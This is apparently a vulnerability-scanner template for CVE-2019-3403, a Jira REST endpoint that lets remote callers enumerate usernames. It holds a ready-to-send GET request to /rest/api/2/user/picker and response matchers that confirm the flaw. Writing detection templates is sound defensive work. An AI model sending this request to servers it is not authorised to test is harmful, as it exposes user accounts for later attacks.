id: CVE-2019-3403 info: name: User enumeration via an incorrect authorisation check author: Ganofins severity: medium description: The /rest/api/2/user/picker rest resource in Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check. reference: https://nvd.nist.gov/vuln/detail/CVE-2019-3403 tags: cve,cve2019,atlassian,jira requests: - method: GET path: - "{{BaseURL}}/rest/api/2/user/picker?query=" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - 'application/json' part: header - type: word words: - users - total - header condition: and